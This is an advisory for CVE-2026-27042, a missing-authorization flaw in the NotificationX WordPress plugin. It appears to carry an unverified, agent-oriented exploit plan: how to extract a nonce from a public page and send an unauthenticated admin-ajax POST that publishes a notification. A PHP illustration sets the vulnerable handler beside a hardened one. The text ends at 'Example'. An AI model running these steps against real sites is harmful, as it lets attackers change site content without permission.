CVE-2026-27042

NotificationX – FOMO, Live Sales Notification, WooCommerce Sales Popup, GDPR, Social Proof, Announcement Banner & Floating Notification Bar <= 3.2.1 - Missing Authorization

Severity: Medium (Missing Authorization)
CVSS Score: 5.3
Patched in: 3.2.2
Time to patch: 110d

Description

The NotificationX – FOMO, Live Sales Notification, WooCommerce Sales Popup, GDPR, Social Proof, Announcement Banner & Floating Notification Bar plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 3.2.1. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 3.2.1
Published: January 15, 2026
Last updated: May 4, 2026
Affected plugin: notificationx

What Changed in the Fix

Changes introduced in v3.2.2


Source Code

WordPress.org SVN
Research Plan
Unverified


This research plan outlines the technical steps required to exploit a missing authorization vulnerability in NotificationX (<= 3.2.1).

1. Vulnerability Summary

The NotificationX plugin for WordPress is vulnerable to Missing Authorization in its AJAX handlers. Specifically, the nx_handle_quick_builder action (and potentially others like nx_get_objects) is registered with both wp_ajax_ and wp_ajax_nopriv_ hooks, but the corresponding callback function fails to perform a current_user_can() check (e.g., for manage_options).

This allows unauthenticated attackers to create, modify, or delete "notifications" (custom post type notificationx), which are used to display FOMO alerts (sales, reviews, etc.) on the site.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: nx_handle_quick_builder
  • Vulnerability Type: Missing Capability Check / Missing Authorization
  • Authentication: None (Unauthenticated)
  • Preconditions: The plugin must be active.
  • Parameter: data (a URL-encoded string containing notification properties) and nonce (if required).

3. Code Flow (Inferred)

  1. The plugin registers the action:
    add_action( 'wp_ajax_nopriv_nx_handle_quick_builder', 'nx_handle_quick_builder_callback' )
  2. The nx_handle_quick_builder_callback function is called.
  3. It retrieves the $_POST['data'] parameter and processes it using parse_str().
  4. It calls wp_insert_post() or a similar wrapper to save the data to the notificationx custom post type.
  5. Crucially, it lacks a check like if ( ! current_user_can( 'manage_options' ) ) wp_die();.
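The inferred flow above, written out as an added illustration (this is not NotificationX source code and not the v3.2.2 fix): the hook names, the callback name, the notificationx post type and the nx_* parameter names are taken from the plan; the function bodies, the nonce action string 'nx_quick_builder', and the hardened callback and its hook name are assumptions. The first handler shows the shape the plan describes, reachable through wp_ajax_nopriv_ with only a nonce in front of the write; the second shows where the missing current_user_can() check belongs relative to the nonce check and the request parsing.

```php
<?php
/*
 * Added illustration, not NotificationX source code. Hook names, callback
 * name, the 'notificationx' post type and the nx_* parameters come from the
 * research plan above; function bodies, the nonce action 'nx_quick_builder'
 * and the hardened callback are assumptions.
 */

/* ---- Inferred vulnerable shape (<= 3.2.1, per section 3 above) ---- */

// Hooking the same callback on wp_ajax_nopriv_ makes it reachable with no
// session at all, so the callback body is the only place authorization can live.
add_action( 'wp_ajax_nx_handle_quick_builder',        'nx_handle_quick_builder_callback' );
add_action( 'wp_ajax_nopriv_nx_handle_quick_builder', 'nx_handle_quick_builder_callback' );

function nx_handle_quick_builder_callback() {
    // A nonce is CSRF protection, not authorization: when it is localized into
    // a public page (section 4), any visitor can read it and satisfy this check.
    check_ajax_referer( 'nx_quick_builder', 'nonce' );

    parse_str( wp_unslash( $_POST['data'] ?? '' ), $data );

    // No current_user_can() before the write, so an unauthenticated caller
    // reaches wp_insert_post() and publishes a notificationx post.
    $post_id = wp_insert_post( array(
        'post_type'   => 'notificationx',
        'post_title'  => sanitize_text_field( $data['nx_notification_title'] ?? '' ),
        'post_status' => ( $data['nx_notification_status'] ?? '' ) === 'publish' ? 'publish' : 'draft',
    ), true );

    if ( is_wp_error( $post_id ) ) {
        wp_send_json_error( $post_id->get_error_message(), 500 );
    }
    wp_send_json_success( array( 'id' => $post_id ) );
}

/* ---- Hardened shape (assumed; shows where the missing check belongs) ---- */

// Authenticated hook only: an action that creates site content has no
// legitimate anonymous caller, so no wp_ajax_nopriv_ registration for it.
// The distinct action name is only so both examples can live in one file.
add_action( 'wp_ajax_nx_handle_quick_builder_hardened', 'nx_handle_quick_builder_hardened' );

function nx_handle_quick_builder_hardened() {
    // Authorization first, before any request data is parsed. manage_options
    // is the capability the plan names; use the narrowest one that fits.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    // Keep the nonce as the CSRF layer for the admin who does hold the
    // capability; it complements the capability check, it does not replace it.
    check_ajax_referer( 'nx_quick_builder', 'nonce' );

    parse_str( wp_unslash( $_POST['data'] ?? '' ), $data );

    $post_id = wp_insert_post( array(
        'post_type'   => 'notificationx',
        'post_title'  => sanitize_text_field( $data['nx_notification_title'] ?? '' ),
        'post_status' => ( $data['nx_notification_status'] ?? '' ) === 'publish' ? 'publish' : 'draft',
    ), true );

    if ( is_wp_error( $post_id ) ) {
        wp_send_json_error( $post_id->get_error_message(), 500 );
    }
    wp_send_json_success( array( 'id' => $post_id ) );
}
```

For triage on an installed copy, the same pattern can be located without the diff: list every `wp_ajax_nopriv_` registration in the plugin directory (for example `grep -rn "wp_ajax_nopriv_" wp-content/plugins/notificationx/`) and confirm that each callback either serves genuinely public data or rejects the request with a capability check before it reaches a write such as wp_insert_post().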

4. Nonce Acquisition Strategy

While the vulnerability is classed as Missing Authorization, the plugin may still check a WordPress nonce. In NotificationX, nonces for the Quick Builder or frontend features are often localized into the frontend page to support dynamic loading, so an unauthenticated visitor can read one from the page source. A nonce obtained this way satisfies only the CSRF layer; it is not a substitute for a current_user_can() check, which is why a handler gated by the nonce alone remains reachable by anyone.

Strategy:

  1. Identify Script Loading: The plugin enqueues scripts when a NotificationX notification is active or when the [notificationx] shortcode is present.
  2. Setup Test Page: Create a public page containing the shortcode.
    wp post create --post_type=page --post_status=publish --post_title="Nonce Page" --post_content="[notificationx]"
    
  3. Extract Nonce: Navigate to this page and use browser_eval to extract the nonce from the localized JavaScript objects.
    • Target Object: window.notificationx_public or window.nx_localize.
    • Nonce Key: nonce or nx_quick_builder_nonce.
    // Execution agent should try:
    browser_eval("window.notificationx_public?.nonce || window.nx_localize?.nonce")
    

5. Exploitation Strategy

The goal is to create a new "Sales Notification" unauthenticated.

HTTP Request (PoC)

  • Method: POST
  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body Parameters:
    • action: nx_handle_quick_builder
    • nonce: [EXTRACTED_NONCE]
    • data: A URL-encoded string representing the notification details.
      • nx_notification_title: Vulnerable Notification
      • nx_source_type: sales
      • nx_notification_type: woo
      • nx_builder_step: 4 (Finalizing step in the builder)
      • nx_notification_status: publish

Example
